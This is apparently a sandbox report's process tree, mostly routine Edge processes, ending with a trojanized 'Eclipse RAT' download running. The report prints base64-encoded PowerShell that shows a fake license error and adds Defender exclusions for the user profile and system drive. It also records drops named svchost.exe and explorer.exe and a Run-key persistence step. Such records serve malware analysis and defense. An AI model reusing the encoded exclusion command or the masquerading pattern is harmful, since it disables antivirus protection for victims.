C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:12⤵PID:432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:12⤵PID:4496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:12⤵PID:1072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:12⤵PID:2452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:12⤵PID:3148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6616 /prefetch:82⤵PID:2772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6552 /prefetch:12⤵PID:2536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6984 /prefetch:82⤵PID:524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7136 /prefetch:12⤵PID:5136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:12⤵PID:5144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7348 /prefetch:12⤵PID:5152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7336 /prefetch:12⤵PID:5160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7664 /prefetch:12⤵PID:5168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7700 /prefetch:12⤵PID:5176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7956 /prefetch:12⤵PID:5184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7976 /prefetch:12⤵PID:5192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7980 /prefetch:12⤵PID:5200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8104 /prefetch:12⤵PID:5208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7964 /prefetch:12⤵PID:5216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8108 /prefetch:12⤵PID:5224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8352 /prefetch:12⤵PID:5232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9068 /prefetch:12⤵PID:5980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9160 /prefetch:12⤵PID:6276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9536 /prefetch:12⤵PID:6284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9932 /prefetch:12⤵PID:6760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10208 /prefetch:12⤵PID:6768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10556 /prefetch:12⤵PID:6904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10924 /prefetch:12⤵PID:7080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8844 /prefetch:12⤵PID:7092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9064 /prefetch:12⤵PID:7100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10120 /prefetch:12⤵PID:6232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10132 /prefetch:12⤵PID:6688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11188 /prefetch:12⤵PID:7076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11340 /prefetch:12⤵PID:7112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11128 /prefetch:12⤵PID:7120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12028 /prefetch:12⤵PID:4668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12200 /prefetch:12⤵PID:7180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12204 /prefetch:12⤵PID:7280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=12684 /prefetch:82⤵PID:7524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=12684 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:7540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11440 /prefetch:12⤵PID:7624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11620 /prefetch:12⤵PID:7740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12592 /prefetch:12⤵PID:7812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10860 /prefetch:12⤵PID:7884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10404 /prefetch:12⤵PID:7956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10684 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8160 /prefetch:12⤵PID:968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10676 /prefetch:12⤵PID:5908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7336 /prefetch:12⤵PID:5864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10460 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1848 /prefetch:12⤵PID:5568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=212 /prefetch:12⤵PID:7996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7552 /prefetch:12⤵PID:4176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:12⤵PID:7228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1124 /prefetch:12⤵PID:7680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2268 /prefetch:12⤵PID:1112
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1876
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1812
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x410 0x3ec1⤵PID:5124
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:7116
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Eclipse RAT\" -ad -an -ai#7zMap14102:84:7zEvent312161⤵
- Suspicious use of AdjustPrivilegeToken
PID:7040
-
C:\Users\Admin\Downloads\Eclipse RAT\Eclipse.exe"C:\Users\Admin\Downloads\Eclipse RAT\Eclipse.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5480 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAYQBzACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGUAbQBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACEAIABMAGkAYwBlAG4AcwBlACAAaABhAHMAIABlAHgAcABpAHIAZQBkAC4AIABDAG8AbgB0AGEAYwB0ACAAdQBzACAAdgBpAGEAIAB0AGUAbABlAGcAcgBhAG0AIABnAHIAbwB1AHAAIAB0AG8AIABwAHUAcgBjAGgAYQBzAGUAIAAvACAAZwBlAHQAIABmAHIAZQBlACAAdAByAGkAYQBsACAAdgBlAHIAcwBpAG8AbgAhACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBmAHoAeAAjAD4A"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5208
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAbgBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAYwB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAZgBnACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5412
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:968
-
-
C:\Users\Admin\AppData\Roaming\explorer.exe"C:\Users\Admin\AppData\Roaming\explorer.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4568 -
C:\Users\Admin\AppData\Roaming\explorer.exe"C:\Users\Admin\AppData\Roaming\explorer.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4284 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\activate.bat4⤵PID:8164
-
C:\Windows\system32\taskkill.exetaskkill /f /im "explorer.exe"5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6932
-
-
C:\Users\Admin\explorer.exe"explorer.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:7936 -
C:\Users\Admin\explorer.exe"explorer.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:7724 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"7⤵PID:7224
-
-
-
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding1⤵PID:3704
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3488 -
C:\Users\Admin\Downloads\Eclipse RAT\crack.exe"C:\Users\Admin\Downloads\Eclipse RAT\crack.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
